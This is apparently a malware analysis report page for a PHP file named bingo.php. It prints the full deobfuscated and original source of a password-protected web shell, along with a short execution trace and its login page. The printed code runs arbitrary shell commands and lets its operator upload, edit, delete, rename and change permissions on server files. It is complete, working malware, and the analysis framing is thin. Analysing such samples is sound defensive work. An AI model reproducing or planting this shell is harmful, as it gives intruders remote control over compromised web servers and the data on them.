PHP Malware Analysis
bingo.php
md5: 18de833b3e1e5d1e93bdf13d0e41841b
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- nicedreambabe@gmail.com (Deobfuscated, Original)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original)
- php_uname (Deobfuscated, Original)
- phpinfo (Deobfuscated, Original)
Execution
- exec (Deobfuscated, Original)
- passthru (Deobfuscated, Original)
- shell_exec (Deobfuscated, Original)
- system (Deobfuscated, Original)
Files
- move_uploaded_file (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- b1ng0 (Original)
Deobfuscated PHP code
<?php
error_reporting(0);
$password = '1cd5e8ba4431b80034347b8a66a2ca5d6d7befa6';
$xyn = 'tunafeesh';
if (isset($_POST['pass'])) {
if (sha1($_POST['pass']) == $password) {
setcookie($xyn, sha1($_POST['pass']), time() + 3600);
}
let_him_in();
}
if (!empty($password) && !isset($_COOKIE[$xyn]) or $_COOKIE[$xyn] != $password) {
initiate();
die;
}
$me = basename("/var/www/html/bingo.php.fdecd7ea04eada991dd3a57c8e2b71f4.bin");
$server_soft = $_SERVER["SERVER_SOFTWARE"];
$uname = php_uname();
$cur_user = get_current_user() . ' uid:' . getmyuid() . ' gid:' . getmygid();
$safe_mode = ini_get('safe_mode');
$safe_mode = $safe_mode ? '<font color:lime>ON</font>' : '<font color=red>OFF</font>';
$cwd = getcwd();
$bckC = '#202020';
$txtC = 'lime';
$start = "<html><head><title>b1ng0</title><style>body {background:#202020;color:lime;font-size:9pt;font-family:sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:lime;}h1#nm{text-shadow:0px 0px 5px black;color:lime;}a {color:lime;text-decoration:none;font-family:sans serif;}a:hover {color:lime;}hr {background:lime;color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:#202020;box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:#202020;border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:#202020;border-radius:10px;border:1px solid lime;color:lime;text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:lime;box-shadow:0px 0px 1px lime;border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid lime;padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:#202020;color:lime;box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type=\"text/javascript\">function get_inf() {if(document.getElementById('moreI').style.display==\"block\"){document.getElementById('moreI').style.display=\"none\"}else {document.getElementById('moreI').style.display=\"block\";}} function xyn(id1,id2) {document.getElementById(id1).style.display=\"block\";document.getElementById(id2).style.display=\"none\";}</script></head><body><h1 id=\"n\"><a href=\"?x=x\"></a></h1>";
$menu = '<center><p id="menu"><span id="menuB"><<a href="' . $me . '">Home</a>> <<a href="?x=cmd&d="' . realpath('.') . '">Command</a>> <<a href="?x=php&d="' . realpath('.') . '">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>';
$end = '</body></html>';
$inf = '<center><p id="inf">||| <b><i><u>Software:</u></i></b> ' . $server_soft . ' ||| <b><i><u>Uname:</u></i></b> ' . $uname . ' |||</br>||| <b><i><u>User:</u></i></b> ' . $cur_user . ' ||| <b><i><u>Safe Mode:</u></i></b> ' . $safe_mode . ' ||| <b><i><u>Directory: </i></b></u>' . $cwd . ' |||</p></center><hr>';
print "<html><head><title>b1ng0</title><style>body {background:#202020;color:lime;font-size:9pt;font-family:sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:lime;}h1#nm{text-shadow:0px 0px 5px black;color:lime;}a {color:lime;text-decoration:none;font-family:sans serif;}a:hover {color:lime;}hr {background:lime;color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:#202020;box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:#202020;border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:#202020;border-radius:10px;border:1px solid lime;color:lime;text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:lime;box-shadow:0px 0px 1px lime;border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid lime;padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:#202020;color:lime;box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type=\"text/javascript\">function get_inf() {if(document.getElementById('moreI').style.display==\"block\"){document.getElementById('moreI').style.display=\"none\"}else {document.getElementById('moreI').style.display=\"block\";}} function xyn(id1,id2) {document.getElementById(id1).style.display=\"block\";document.getElementById(id2).style.display=\"none\";}</script></head><body><h1 id=\"n\"><a href=\"?x=x\"></a></h1>";
print $menu;
print $inf;
$moreI = array('PHP Version' => phpversion(), 'Zend Version' => zend_version(), 'Magic Quotes' => magic_quotes(), 'Curl' => curl(), 'Register Globals' => reg_globals(), 'OpenBase Dir' => openbase_dir(), 'MySQL' => myql(), 'Gzip' => gzip(), 'MsSQL' => mssql(), 'PostgreSQL' => postgresql(), 'Oracle' => oracle(), 'Total Space' => h_size(disk_total_space('/')), 'Used Space' => h_size(disk_free_space('/')), 'Your IP' => $_SERVER['REMOTE_ADDR'], 'Server IP' => $_SERVER['SERVER_ADDR']);
print "<table id=\"moreI\">";
foreach ($moreI as $n => $v) {
print '<td>' . $n . '</td><td> :> </td><td> ' . $v . '</td><tr>';
}
print "<td colspan=3 align=\"center\"><a href=\"?x=phpinf\" target=\"_blank\">PHPInfo</a></td></table>";
if (isset($_GET['d'])) {
chdir($_GET['d']);
}
if (isset($_REQUEST['x'])) {
print '<p id="bck"><a href="?d=' . realpath('.') . '">BACK</a></p>';
switch ($_REQUEST['x']) {
case 'c':
if (isset($_POST['edit_form'])) {
$f = $_GET['f'];
$e = fopen($f, 'w') or print "<p id=\"nn\">Error Opening File</p>";
fwrite($e, $_POST['edit_form']) or print "<p id=\"nn\">Couldn't Save File</p>";
fclose($e);
}
print '<center><p>Editing ' . $_GET['f'] . ' (' . perms($_GET['d'] . $_GET['f']) . ') .</p></br></br><form action="?x=c&d=' . realpath('.') . '&f=' . $_GET['f'] . '" method="POST"><textarea cols=90 rows=15 name="edit_form" id="edit">';
if (file_exists($_GET['f'])) {
$c = file($_GET['f']);
foreach ($c as $l) {
print htmlspecialchars($l);
}
}
print "</textarea></br></br><input type=\"submit\" value=\"Save\" id=\"sv\"></form></center>";
break;
case 'cmd':
print '</br></br><center><h3>Execute Command</h3><form action="?x=cmd&d=' . realpath('.') . '" method="POST"><input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';
if (isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
execute(exec_meth(), $cmd);
}
print "</textarea></center>";
break;
case 'php':
print '</br></br><center><h3>PHP Code</h3><form action=?x=php&d="' . realpath('.') . '" method="POST"><input type="text" value="" name="pcode" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';
print "</textarea></center>";
break;
case 'phpinf':
phpinfo();
break;
case 'q':
setcookie($xyn, '', time() - 3600);
let_him_in();
break;
case 'x':
print "</br></br></br><center><h1 id=\"nm\">hope you good day</h1><h3><a href=\"mailto:nicedreambabe@gmail.com\">come on</center>";
break;
}
} else {
if (isset($_GET['d'])) {
chdir($_GET['d']);
}
if (isset($_GET['ndir'])) {
$d = $_GET['d'];
$n = $_GET['ndir'];
mkdir($d . DIRECTORY_SEPARATOR . $n);
}
if (isset($_POST['new'])) {
$n = $_POST['new'];
$o = $_POST['old'];
$d = $_POST['d'];
rename($d . DIRECTORY_SEPARATOR . $o, $d . DIRECTORY_SEPARATOR . $n);
}
if (isset($_GET['deld'])) {
$d = $_GET['deld'];
rmdir($d);
}
if (isset($_GET['delf'])) {
$d = $_GET['delf'];
unlink($d);
}
if (isset($_GET['ch'])) {
$ch = $_GET['ch'];
$d = $_GET['df'];
chmod($d, $ch);
}
if (isset($_FILES['upfile']['name'])) {
$d = realpath('.') . DIRECTORY_SEPARATOR . basename($_FILES['upfile']['name']);
move_uploaded_file($_FILES['upfile']['tmp_name'], $d);
}
print '<p align="center" id="cp">' . curpath('') . '</p>';
print '<table width=90% align="center" id="lt"cellpadding="0"><td align="center"><form action="?d=' . realpath('.') . '" method="GET">Create Dir: <input type="hidden" name="d" value="' . realpath('.') . '" id="lt"><input type="text" value="" name="ndir" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d="' . realpath('.') . '" method="GET">Create File: <input type="hidden" value="' . realpath('.') . '" name="d" id="lt"><input type="hidden" value="c" name="x"><input type="text" value="" name="f" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?x=cmd&d=' . realpath('.') . '" method="POST">Command: <input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d=' . realpath('.') . '" method="POST" enctype="multipart/form-data">Upload: <input type="hidden" value="100000000" name="MAX_FILE_SIZE"><input type="file" name="upfile" id="ltb"> <input type="submit" value="Go" id="lt"></form></td></table>';
print "</br>";
$filex = array();
$dirx = array();
print "<table width=\"75%\" align=\"center\" id=\"ft\" ><td id=\"fh\"><b>Name</b></td><td id=\"fh\" align=\"center\"><b>Permissions</b></td><td id=\"fh\" align=\"center\"><b>Owner</b></td><td id=\"fh\" align=\"center\"><b>Options</b></td><tr id=\"fn\">";
if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if (is_dir($file)) {
$dirx[] .= $file;
} else {
$filex[] .= $file;
}
}
asort($filex);
asort($dirx);
$i = 0;
foreach ($dirx as $file) {
if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
$own = posix_getpwuid(fileowner($file));
$grp = posix_getgrgid(filegroup($file));
} else {
$own['name'] = '???';
$grp['name'] = '???';
}
print '<td id="fc"><span id="n' . $file . '"><a href="?d=' . realpath($file) . '">' . $file . '</a></span><span id="r' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="POST"><input type="hidden" value="' . realpath('.') . '" name="d"> <input type="text" value="' . $file . '" id="lt" name="new"><input type="hidden" value="' . $file . '" name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'n' . $file . '\',\'r' . $file . '\');"></form></span><span id="d' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET">Are you Sure?<input type="hidden" value="' . realpath($file) . '" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n' . $file . '\',\'d' . $file . '\')"></form></span></td><td id="fc" align="center"><span id="h' . $file . '"><a href="javascript:xyn(\'c' . $file . '\',\'h' . $file . '\');"><font color="' . get_color($file) . '">' . perms($file) . '</font></a></span><span id="c' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET"><input type="hidden" value="' . realpath($file) . '" name="df"><input type="text" value="' . perms($file) . '" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h' . $file . '\',\'c' . $file . '\');"></form></span></td><td id="fc" align="center">' . $own['name'] . ' : ' . $grp['name'] . '</td>';
if ($i == 0 or $i == 1) {
print "<td id=\"fc\"></td><tr id=\"fn\">";
} else {
print '<td id="fc" align="center"><a href="javascript:xyn(\'r' . $file . '\',\'n' . $file . '\')">[R]</a> <a href="javascript:xyn(\'d' . $file . '\',\'n' . $file . '\')">[D]</a></td><tr id="fn">';
}
$i++;
}
foreach ($filex as $file) {
if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
$own = posix_getpwuid(fileowner($file));
$grp = posix_getgrgid(filegroup($file));
} else {
$own['name'] = '???';
$grp['name'] = '???';
}
print '<td id="fc"><span id="n' . $file . '"><a href="?x=c&d=' . realpath('.') . '&f=' . $file . '">' . $file . '</a></span><span id="r' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="POST"><input type="hidden" value="' . realpath('.') . '" name="d"> <input type="text" id="lt" value="' . $file . '" name="new"><input type="hidden" value="' . $file . '" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onClick="xyn(\'n' . $file . '\',\'r' . $file . '\');"></form></span><span id="d' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET">Are you Sure?<input type="hidden" value="' . realpath($file) . '" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n' . $file . '\',\'d' . $file . '\')"></form></span></td><td id="fc" align="center"><span id="h' . $file . '"><a href="javascript:xyn(\'c' . $file . '\',\'h' . $file . '\');"><font color="' . get_color($file) . '">' . perms($file) . '</font></a></span><span id="c' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET"><input type="hidden" value="' . realpath($file) . '" name="df"><input type="text" value="' . perms($file) . '" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h' . $file . '\',\'c' . $file . '\');"></form></span></td><td id="fc" align="center">' . $own['name'] . ' : ' . $grp['name'] . '</td><td id="fc" align="center"><a href="javascript:xyn(\'r' . $file . '\',\'n' . $file . '\')">[R]</a> <a href="javascript:xyn(\'d' . $file . '\',\'n' . $file . '\');">[D]</a></td><tr id="fn">';
}
}
print "</table></br></br></br>";
}
function openbase_dir()
{
$x = ini_get('open_basedir');
if (!$x) {
$o = '<font color=red>OFF</font>';
} else {
$o = '<font color=lime>ON</font>';
}
return $o;
}
function magic_quotes()
{
$x = get_magic_quotes_gpc();
if (empty($x)) {
$m = '<font color=red>OFF</font>';
} else {
$m = '<font color=lime>ON</font>';
}
return $m;
}
function curl()
{
if (extension_loaded('curl')) {
$c = '<font color=lime>ON</font>';
} else {
$c = '<font color=red>OFF</font>';
}
return $c;
}
function reg_globals()
{
if (ini_get('reqister_globals')) {
$r = '<font color=lime>ON</font>';
} else {
$r = '<font color=red>OFF</font>';
}
return $r;
}
function oracle()
{
if (function_exists('ocilogon')) {
$o = '<font color=lime>ON</font>';
} else {
$o = '<font color=red>OFF</font>';
}
return $o;
}
function postgresql()
{
if (function_exists('pg_connect')) {
$p = '<font color=lime>ON</font>';
} else {
$p = '<font color=red>OFF</font>';
}
return $p;
}
function myql()
{
if (function_exists('mysql_connect')) {
$m = '<font color=lime>ON</font>';
} else {
$m = '<font color=red>OFF</font>';
}
return $m;
}
function mssql()
{
if (function_exists('mssql_connect')) {
$m = '<font color=lime>ON</font>';
} else {
$m = '<font color=red>OFF</font>';
}
return $m;
}
function gzip()
{
if (function_exists('gzencode')) {
$m = '<font color=lime>ON</font>';
} else {
$m = '<font color=red>OFF</font>';
}
return $m;
}
function h_size($s)
{
if ($s >= 1073741824) {
$s = round($s / 1073741824 * 100) / 100 . 'GB';
} elseif ($s >= 1048576) {
$s = round($s / 1048576 * 100) / 100 . 'MB';
} elseif ($s >= 1024) {
$s = round($s / 1024 * 100) / 100 . 'KB';
} else {
$s .= 'B';
}
return $s;
}
function curpath($d)
{
if ($d == '') {
$d = getcwd();
}
$p = '';
$n = '';
$dx = explode(DIRECTORY_SEPARATOR, $d);
for ($i = 0; $i < count($dx); $i++) {
$g = $dx[$i];
$p .= $dx[$i] . DIRECTORY_SEPARATOR;
$n .= '<a href="?d=' . $p . '">' . $g . '</a>' . DIRECTORY_SEPARATOR;
}
return $n;
}
function get_color($f)
{
if (is_writable($f)) {
$c = 'lime';
}
if (!is_writable($f) && is_readable($f)) {
$c = '' . $txtC . '';
}
if (!is_writable($f) && !is_readable($f)) {
$c = 'red';
}
return $c;
}
function perms($f)
{
if (file_exists($f)) {
return substr(sprintf('%o', fileperms($f)), -4);
} else {
return "???";
}
}
function exec_meth()
{
if (function_exists('passthru')) {
$m = 'passthru';
}
if (function_exists('exec')) {
$m = 'exec';
}
if (function_exists('shell_exec')) {
$m = 'shell_exec';
}
if (function_exists('system')) {
$m = 'system';
}
if (!isset($m)) {
$m = 'Disabled';
}
return $m;
}
function execute($m, $c)
{
if ($m == 'passthru') {
passthru($c);
} elseif ($m == 'system') {
system($c);
} elseif ($m == 'shell_exec') {
print shell_exec($c);
} elseif ($m == 'exec') {
exec($c, $r);
foreach ($r as $o) {
print $o . '</br>';
}
} else {
print "dafuq?";
}
}
function initiate()
{
print '<table border=0 width=100% height=100% align=center style="background:#202020;color:lime;"><td valign="middle"><center><form action="' . basename("/var/www/html/bingo.php.fdecd7ea04eada991dd3a57c8e2b71f4.bin") . '" method="POST">Password <input type="password" maxlength="10" name="pass" style="background:#202020;color:lime;border-radius:10px;border:1px solid silver;text-align:center;"> <input type="submit" value=">>" style="background:#202020;color:lime;border-radius:10px;border:1px solid silver;"></form></center></td></table>';
}
function let_him_in()
{
header("Location: " . basename("/var/www/html/bingo.php.fdecd7ea04eada991dd3a57c8e2b71f4.bin"));
}
print $end;Execution traces
data/traces/18de833b3e1e5d1e93bdf13d0e41841b_trace-1676262305.107.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:25:31.004798]
1 0 1 0.000136 393512
1 3 0 0.000630 491528 {main} 1 /var/www/html/uploads/bingo.php 0 0
2 4 0 0.000648 491528 error_reporting 0 /var/www/html/uploads/bingo.php 2 1 0
2 4 1 0.000663 491568
2 4 R 22527
1 A /var/www/html/uploads/bingo.php 3 $password = '1cd5e8ba4431b80034347b8a66a2ca5d6d7befa6'
1 A /var/www/html/uploads/bingo.php 6 $xyn = 'tunafeesh'
2 5 0 0.000705 491528 initiate 1 /var/www/html/uploads/bingo.php 13 0
3 6 0 0.000717 491528 basename 0 /var/www/html/uploads/bingo.php 70 1 '/var/www/html/uploads/bingo.php'
3 6 1 0.000733 491600
3 6 R 'bingo.php'
2 5 1 0.000749 491528
0.000776 412384
TRACE END [2023-02-13 02:25:31.005466]
Generated HTML code
<html><head></head><body><table border="0" width="100%" height="100%" align="center" style="background:#202020;color:lime;"><tbody><tr><td valign="middle"><center><form action="bingo.php" method="POST">Password <input type="password" maxlength="10" name="pass" style="background:#202020;color:lime;border-radius:10px;border:1px solid silver;text-align:center;"> <input type="submit" value=">>" style="background:#202020;color:lime;border-radius:10px;border:1px solid silver;"></form></center></td></tr></tbody></table></body></html>Original PHP code
<?php
error_reporting(0);
$password='1cd5e8ba4431b80034347b8a66a2ca5d6d7befa6';
$xyn='tunafeesh';
if(isset($_POST['pass'])) {
if(sha1($_POST['pass']) == $password) {
setcookie($xyn, sha1($_POST['pass']), time()+3600);
} let_him_in();
}
if(!empty($password) && !isset($_COOKIE[$xyn]) or ($_COOKIE[$xyn] != $password)) {
initiate(); die();
}
$me=basename(__FILE__);$server_soft=$_SERVER["SERVER_SOFTWARE"];$uname=php_uname();$cur_user =get_current_user().' uid:'.getmyuid().' gid:'.getmygid();$safe_mode=ini_get('safe_mode');$safe_mode=($safe_mode)?('<font color:lime>ON</font>'):('<font color=red>OFF</font>');$cwd=getcwd();$bckC='#202020';$txtC='lime';
$start='<html><head><title>b1ng0</title><style>body {background:'.$bckC.';color:'.$txtC.';font-size:9pt;font-family:sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:lime;}h1#nm{text-shadow:0px 0px 5px black;color:lime;}a {color:'.$txtC.';text-decoration:none;font-family:sans serif;}a:hover {color:lime;}hr {background:'.$txtC.';color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:'.$bckC.';box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:'.$bckC.';border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:'.$bckC.';border-radius:10px;border:1px solid '.$txtC.';color:'.$txtC.';text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:'.$txtC.';box-shadow:0px 0px 1px '.$txtC.';border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid '.$txtC.';padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:'.$bckC.';color:'.$txtC.';box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type="text/javascript">function get_inf() {if(document.getElementById(\'moreI\').style.display=="block"){document.getElementById(\'moreI\').style.display="none"}else {document.getElementById(\'moreI\').style.display="block";}} function xyn(id1,id2) {document.getElementById(id1).style.display="block";document.getElementById(id2).style.display="none";}</script></head><body><h1 id="n"><a href="?x=x"></a></h1>';
$menu='<center><p id="menu"><span id="menuB"><<a href="'.$me.'">Home</a>> <<a href="?x=cmd&d="'.realpath('.').'">Command</a>> <<a href="?x=php&d="'.realpath('.').'">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>';$end='</body></html>';$inf='<center><p id="inf">||| <b><i><u>Software:</u></i></b> '.$server_soft.' ||| <b><i><u>Uname:</u></i></b> '.$uname.' |||</br>||| <b><i><u>User:</u></i></b> '.$cur_user.' ||| <b><i><u>Safe Mode:</u></i></b> '.$safe_mode.' ||| <b><i><u>Directory: </i></b></u>'.$cwd.' |||</p></center><hr>';
print $start;print $menu;print $inf;
$moreI=array('PHP Version' => phpversion(),'Zend Version' => zend_version(),'Magic Quotes' => magic_quotes(),'Curl' => curl(),'Register Globals' => reg_globals(),'OpenBase Dir' => openbase_dir(),'MySQL' => myql(),'Gzip' => gzip(),'MsSQL' => mssql(),'PostgreSQL' => postgresql(),'Oracle' => oracle(),'Total Space' => h_size(disk_total_space('/')) ,'Used Space' => h_size(disk_free_space('/')),'Your IP' => $_SERVER['REMOTE_ADDR'],'Server IP' => $_SERVER['SERVER_ADDR']);print '<table id="moreI">'; foreach($moreI as $n => $v) {print '<td>'.$n.'</td><td> :> </td><td> '.$v.'</td><tr>';} print '<td colspan=3 align="center"><a href="?x=phpinf" target="_blank">PHPInfo</a></td></table>';
if(isset($_GET['d'])) {chdir($_GET['d']);}
if(isset($_REQUEST['x']))
{
print '<p id="bck"><a href="?d='.realpath('.').'">BACK</a></p>';
switch($_REQUEST['x'])
{
case 'c': if(isset($_POST['edit_form'])){$f=$_GET['f'];$e=fopen($f,'w') or print '<p id="nn">Error Opening File</p>';fwrite($e,$_POST['edit_form']) or print '<p id="nn">Couldn\'t Save File</p>';fclose($e);}print '<center><p>Editing '.$_GET['f'].' ('.perms($_GET['d'] . $_GET['f']).') .</p></br></br><form action="?x=c&d='.realpath('.').'&f='.$_GET['f'].'" method="POST"><textarea cols=90 rows=15 name="edit_form" id="edit">';if(file_exists($_GET['f'])){$c=file($_GET['f']);foreach($c as $l){print htmlspecialchars($l);}}print '</textarea></br></br><input type="submit" value="Save" id="sv"></form></center>';break;
case 'cmd': print '</br></br><center><h3>Execute Command</h3><form action="?x=cmd&d='.realpath('.').'" method="POST"><input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';if(isset($_POST['cmd'])) {$cmd=$_POST['cmd']; execute(exec_meth(),$cmd);}print '</textarea></center>';break;
case 'php': print '</br></br><center><h3>PHP Code</h3><form action=?x=php&d="'.realpath('.').'" method="POST"><input type="text" value="" name="pcode" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';print '</textarea></center>';break;
case 'phpinf': phpinfo();break;
case 'q': setcookie($xyn,'',time()-3600);let_him_in();break;
case 'x': print '</br></br></br><center><h1 id="nm">hope you good day</h1><h3><a href="mailto:nicedreambabe@gmail.com">come on</center>';break;
}
}
else
{
if(isset($_GET['d'])) {chdir($_GET['d']);}
if(isset($_GET['ndir'])) {$d=$_GET['d'];$n=$_GET['ndir'];mkdir($d .DIRECTORY_SEPARATOR. $n);}
if(isset($_POST['new'])) {$n=$_POST['new'];$o=$_POST['old'];$d=$_POST['d'];rename($d.DIRECTORY_SEPARATOR.$o,$d.DIRECTORY_SEPARATOR.$n);}
if(isset($_GET['deld'])) {$d=$_GET['deld']; rmdir($d);}
if(isset($_GET['delf'])) {$d=$_GET['delf']; unlink($d);}
if(isset($_GET['ch'])) {$ch=$_GET['ch']; $d=$_GET['df']; chmod($d,$ch);}
if(isset($_FILES['upfile']['name'])) {$d=realpath('.').DIRECTORY_SEPARATOR.basename($_FILES['upfile']['name']);move_uploaded_file($_FILES['upfile']['tmp_name'],$d);}
print '<p align="center" id="cp">'.curpath('').'</p>';
print '<table width=90% align="center" id="lt"cellpadding="0"><td align="center"><form action="?d='.realpath('.').'" method="GET">Create Dir: <input type="hidden" name="d" value="'.realpath('.').'" id="lt"><input type="text" value="" name="ndir" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d="'.realpath('.').'" method="GET">Create File: <input type="hidden" value="'.realpath('.').'" name="d" id="lt"><input type="hidden" value="c" name="x"><input type="text" value="" name="f" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?x=cmd&d='.realpath('.').'" method="POST">Command: <input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d='.realpath('.').'" method="POST" enctype="multipart/form-data">Upload: <input type="hidden" value="100000000" name="MAX_FILE_SIZE"><input type="file" name="upfile" id="ltb"> <input type="submit" value="Go" id="lt"></form></td></table>';
print '</br>';
$filex=array();
$dirx=array();
print '<table width="75%" align="center" id="ft" ><td id="fh"><b>Name</b></td><td id="fh" align="center"><b>Permissions</b></td><td id="fh" align="center"><b>Owner</b></td><td id="fh" align="center"><b>Options</b></td><tr id="fn">';
if($handle=opendir('.')) {while(false !== ($file=readdir($handle))) {if(is_dir($file)) {$dirx[] .= $file;} else {$filex[] .= $file;}}asort($filex);asort($dirx);$i=0;
foreach($dirx as $file) {if(function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {$own=posix_getpwuid(fileowner($file)); $grp=posix_getgrgid(filegroup($file));} else {$own['name']='???'; $grp['name']='???';} print '<td id="fc"><span id="n'.$file.'"><a href="?d='.realpath($file).'">'.$file.'</a></span><span id="r'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="POST"><input type="hidden" value="'.realpath('.').'" name="d"> <input type="text" value="'.$file.'" id="lt" name="new"><input type="hidden" value="'.$file.'" name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'n'.$file.'\',\'r'.$file.'\');"></form></span><span id="d'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="GET">Are you Sure?<input type="hidden" value="'.realpath($file).'" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n'.$file.'\',\'d'.$file.'\')"></form></span></td><td id="fc" align="center"><span id="h'.$file.'"><a href="javascript:xyn(\'c'.$file.'\',\'h'.$file.'\');"><font color="'.get_color($file).'">'.perms($file).'</font></a></span><span id="c'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="GET"><input type="hidden" value="'.realpath($file).'" name="df"><input type="text" value="'.perms($file).'" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h'.$file.'\',\'c'.$file.'\');"></form></span></td><td id="fc" align="center">'.$own['name'].' : '.$grp['name'].'</td>'; if($i==0 or $i==1) {print '<td id="fc"></td><tr id="fn">';} else {print '<td id="fc" align="center"><a href="javascript:xyn(\'r'.$file.'\',\'n'.$file.'\')">[R]</a> <a href="javascript:xyn(\'d'.$file.'\',\'n'.$file.'\')">[D]</a></td><tr id="fn">';} $i++;}
foreach($filex as $file) {if(function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {$own=posix_getpwuid(fileowner($file)); $grp=posix_getgrgid(filegroup($file));} else {$own['name']='???'; $grp['name']='???';} print '<td id="fc"><span id="n'.$file.'"><a href="?x=c&d='.realpath('.').'&f='.$file.'">'.$file.'</a></span><span id="r'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="POST"><input type="hidden" value="'.realpath('.').'" name="d"> <input type="text" id="lt" value="'.$file.'" name="new"><input type="hidden" value="'.$file.'" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onClick="xyn(\'n'.$file.'\',\'r'.$file.'\');"></form></span><span id="d'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="GET">Are you Sure?<input type="hidden" value="'.realpath($file).'" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" 